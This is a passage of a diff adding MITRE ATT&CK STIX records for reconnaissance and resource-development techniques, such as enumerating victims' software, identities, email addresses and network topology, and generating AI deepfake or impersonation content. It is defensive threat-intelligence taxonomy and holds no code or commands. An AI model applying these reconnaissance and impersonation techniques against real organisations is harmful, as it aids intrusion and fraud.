+                    "type": "attack-pattern",
+                    "id": "attack-pattern--baf60e1a-afe5-4d31-830f-1b1ba2351884",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-02 16:42:17.482000+00:00",
+                    "modified": "2026-05-12 15:12:00.710000+00:00",
+                    "name": "Software",
+                    "description": "Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Additionally, adversaries may analyze metadata from victim-owned files (e.g., PDFs, DOCs, images, and sound files hosted on victim-owned websites) to extract information about the software and hardware used to create or process those files. Metadata may reveal software versions, configurations, or timestamps that indicate outdated or vulnerable software. This information can be cross-referenced with known CVEs to identify potential vectors for exploitation in future operations.(Citation: Outpost24)\n\nGathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or for initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "reconnaissance"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1592/002",
+                            "external_id": "T1592.002"
+                        },
+                        {
+                            "source_name": "ATT ScanBox",
+                            "description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.",
+                            "url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks"
+                        },
+                        {
+                            "source_name": "Outpost24",
+                            "description": "Stijn Vande Casteele. (2025, March 31). How to analyze metadata and hide it from hackers. Retrieved July 2, 2025.",
+                            "url": "https://outpost24.com/blog/metadata-hackers-best-friend/"
+                        },
+                        {
+                            "source_name": "ThreatConnect Infrastructure Dec 2020",
+                            "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.",
+                            "url": "https://threatconnect.com/blog/infrastructure-research-hunting/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Michal Biesiada"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.710000+00:00\", \"old_value\": \"2025-10-24 17:49:17.631000+00:00\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0888: Detection of Software"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--5282dd9a-d26d-4e16-88b7-7c0f4553daf4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-02 14:54:59.263000+00:00",
+                    "modified": "2026-05-12 15:12:00.633000+00:00",
+                    "name": "Gather Victim Identity Information",
+                    "description": "Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about users could also be enumerated via other active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system or permitted MFA /methods associated with those usernames.(Citation: GrimBlog UsernameEnum)(Citation: Obsidian SSPR Abuse 2023) Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks)\n\nGathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "reconnaissance"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1589",
+                            "external_id": "T1589"
+                        },
+                        {
+                            "source_name": "OPM Leak",
+                            "description": "Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS. Retrieved September 16, 2024.",
+                            "url": "https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/"
+                        },
+                        {
+                            "source_name": "Detectify Slack Tokens",
+                            "description": "Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved November 17, 2024.",
+                            "url": "https://labs.detectify.com/writeups/slack-bot-token-leakage-exposing-business-critical-information/"
+                        },
+                        {
+                            "source_name": "GitHub truffleHog",
+                            "description": "Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October 19, 2020.",
+                            "url": "https://github.com/dxa4481/truffleHog"
+                        },
+                        {
+                            "source_name": "GrimBlog UsernameEnum",
+                            "description": "GrimHacker. (2017, July 24). Office365 ActiveSync Username Enumeration. Retrieved December 9, 2021.",
+                            "url": "https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/"
+                        },
+                        {
+                            "source_name": "Register Uber",
+                            "description": "McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub into court to find who hacked database of 50,000 drivers. Retrieved October 19, 2020.",
+                            "url": "https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/"
+                        },
+                        {
+                            "source_name": "GitHub Gitrob",
+                            "description": "Michael Henriksen. (2018, June 9). Gitrob: Putting the Open Source in OSINT. Retrieved October 19, 2020.",
+                            "url": "https://github.com/michenriksen/gitrob"
+                        },
+                        {
+                            "source_name": "CNET Leaks",
+                            "description": "Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020.",
+                            "url": "https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/"
+                        },
+                        {
+                            "source_name": "Obsidian SSPR Abuse 2023",
+                            "description": "Noah Corradin and Shuyang Wang. (2023, August 1). Behind The Breach: Self-Service Password Reset (SSPR) Abuse in Azure AD. Retrieved March 28, 2024.",
+                            "url": "https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/"
+                        },
+                        {
+                            "source_name": "Forbes GitHub Creds",
+                            "description": "Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved October 19, 2020.",
+                            "url": "https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196"
+                        },
+                        {
+                            "source_name": "Register Deloitte",
+                            "description": "Thomson, I. (2017, September 26). Deloitte is a sitting duck: Key systems with RDP open, VPN and proxy 'login details leaked'. Retrieved October 19, 2020.",
+                            "url": "https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)",
+                        "Obsidian Security"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.633000+00:00\", \"old_value\": \"2025-10-24 17:48:47.303000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0841: Detection of Gather Victim Identity Information"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--69f897fd-12a9-4c89-ad6a-46d2f3c38262",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-02 14:56:24.866000+00:00",
+                    "modified": "2026-05-12 15:12:00.640000+00:00",
+                    "name": "Email Addresses",
+                    "description": "Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.\n\nAdversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Email addresses could also be enumerated via more active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)), such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) For example, adversaries may be able to enumerate email addresses in Office 365 environments by querying a variety of publicly available API endpoints, such as autodiscover and GetCredentialType.(Citation: GitHub Office 365 User Enumeration)(Citation: Azure Active Directory Reconnaisance)\n\nGathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Brute Force](https://attack.mitre.org/techniques/T1110) via [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "reconnaissance"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1589/002",
+                            "external_id": "T1589.002"
+                        },
+                        {
+                            "source_name": "Azure Active Directory Reconnaisance",
+                            "description": "Dr. Nestori Syynimaa. (2020, June 13). Just looking: Azure Active Directory reconnaissance as an outsider. Retrieved May 27, 2022.",
+                            "url": "https://o365blog.com/post/just-looking/"
+                        },
+                        {
+                            "source_name": "GitHub Office 365 User Enumeration",
+                            "description": "gremwell. (2020, March 24). Office 365 User Enumeration. Retrieved May 27, 2022.",
+                            "url": "https://github.com/gremwell/o365enum"
+                        },
+                        {
+                            "source_name": "GrimBlog UsernameEnum",
+                            "description": "GrimHacker. (2017, July 24). Office365 ActiveSync Username Enumeration. Retrieved December 9, 2021.",
+                            "url": "https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/"
+                        },
+                        {
+                            "source_name": "HackersArise Email",
+                            "description": "Hackers Arise. (n.d.). Email Scraping and Maltego. Retrieved October 20, 2020.",
+                            "url": "https://www.hackers-arise.com/email-scraping-and-maltego"
+                        },
+                        {
+                            "source_name": "CNET Leaks",
+                            "description": "Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020.",
+                            "url": "https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.640000+00:00\", \"old_value\": \"2025-10-24 17:48:54.336000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0814: Detection of Email Addresses"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--6c2957f9-502a-478c-b1dd-d626c0659413",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-02 16:01:35.350000+00:00",
+                    "modified": "2026-05-12 15:12:00.640000+00:00",
+                    "name": "Network Security Appliances",
+                    "description": "Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "reconnaissance"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1590/006",
+                            "external_id": "T1590.006"
+                        },
+                        {
+                            "source_name": "Nmap Firewalls NIDS",
+                            "description": "Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls and Intrusion Detection Systems. Retrieved October 20, 2020.",
+                            "url": "https://nmap.org/book/firewalls.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.640000+00:00\", \"old_value\": \"2025-10-24 17:48:55.360000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0889: Detection of Network Security Appliances"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--34ab90a3-05f6-4259-8f21-621081fdaba5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-02 15:49:03.815000+00:00",
+                    "modified": "2026-05-12 15:12:00.625000+00:00",
+                    "name": "Network Topology",
+                    "description": "Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "reconnaissance"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1590/004",
+                            "external_id": "T1590.004"
+                        },
+                        {
+                            "source_name": "DNS Dumpster",
+                            "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.",
+                            "url": "https://dnsdumpster.com/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.625000+00:00\", \"old_value\": \"2025-10-24 17:48:37.652000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0819: Detection of Network Topology"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--937e4772-8441-4e4a-8bf0-8d447d667e23",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-02 16:27:02.339000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "Gather Victim Org Information",
+                    "description": "Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "reconnaissance"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1591",
+                            "external_id": "T1591"
+                        },
+                        {
+                            "source_name": "ThreatPost Broadvoice Leak",
+                            "description": "Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records, Personal Voicemail Transcripts. Retrieved October 20, 2020.",
+                            "url": "https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/"
+                        },
+                        {
+                            "source_name": "SEC EDGAR Search",
+                            "description": "U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved November 17, 2024.",
+                            "url": "https://www.sec.gov/edgar/search/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2025-10-24 17:49:06.846000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0890: Detection of Gather Victim Org Information"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--b512fb8a-18dd-4bfc-bbad-acbaaeb7dde3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-03-25 14:24:06.194000+00:00",
+                    "modified": "2026-05-12 15:12:00.709000+00:00",
+                    "name": "Generate Content",
+                    "description": "Adversaries may create or generate content to support targeting and operations. This content may be used to establish personas, impersonate known individuals or organizations, and support [Social Engineering](https://attack.mitre.org/techniques/T1684), fraud, or influence activities. Written materials, audio, images, video, or other media may be developed and tailored to the target and objective.(Citation: IBM AI-Generated Content)\n\nContent development may occur prior to or during an operation. Adversaries may develop or generate content in-house, source it through third parties, or produce it using AI-assisted tools. Adversaries may use AI to research targets, develop pretexts, and better understand the organizations and individuals they intend to target or deceive prior to generating content (i.e., [Query Public AI Services](https://attack.mitre.org/techniques/T1682)); for obtaining access to AI tools used in content generation, see [Artificial Intelligence](https://attack.mitre.org/techniques/T1588/007). \n\nContent may be leveraged in support of techniques such as [Phishing](https://attack.mitre.org/techniques/T1566), [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Social Engineering](https://attack.mitre.org/techniques/T1684), [Financial Theft](https://attack.mitre.org/techniques/T1657), or [Establish Accounts](https://attack.mitre.org/techniques/T1585). Generated or developed content does not include malicious code or scripts (i.e., [Develop Capabilities](https://attack.mitre.org/techniques/T1587) and [Artificial Intelligence](https://attack.mitre.org/techniques/T1588/007)).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "resource-development"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1683",
+                            "external_id": "T1683"
+                        },
+                        {
+                            "source_name": "IBM AI-Generated Content",
+                            "description": "Tim Mucci. (n.d.). What is AI-Generated Content?. Retrieved April 22, 2026.",
+                            "url": "https://www.ibm.com/think/insights/ai-generated-content"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.709000+00:00\", \"old_value\": \"2026-04-23 23:36:34.476000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0916: Detection of Generate Content"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--8f452cb4-cbf4-4522-8b11-448787be95c4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-03-25 14:28:15.331000+00:00",
+                    "modified": "2026-05-12 15:12:00.705000+00:00",
+                    "name": "Audio-Visual Content",
+                    "description": "Adversaries may create or manipulate audio, image, and video content to support targeting and malicious operations. Adversaries may also use synthetic voice recordings, real-time altered audio or video during live interactions, fabricated profile photos and identity documents, or video content depicting fabricated or impersonated individuals.(Citation: Nov AI Threat Tracker)\n\nContent may be produced manually through editing tools, generated using AI-assisted tools, or produced using third-party synthetic services.(Citation: FBI 2025 AI Generate Content)(Citation: Europol Deepfakes) AI-assisted tools have enabled adversaries to produce synthetic media at scale and generate content that is more difficult to identify as inauthentic. \n\nAudio-visual content produced through these methods may be used in support of other techniques, such as [Phishing](https://attack.mitre.org/techniques/T1660), [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003), [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Social Engineering](https://attack.mitre.org/techniques/T1684), [Financial Theft](https://attack.mitre.org/techniques/T1657), or [Establish Accounts](https://attack.mitre.org/techniques/T1585).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "resource-development"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1683/002",
+                            "external_id": "T1683.002"
+                        },
+                        {
+                            "source_name": "Europol Deepfakes",
+                            "description": "Europol. (2022). FACING REALITY? LAW ENFORCEMENT AND THE CHALLENGE OF DEEPFAKES. Retrieved April 17, 2026.",
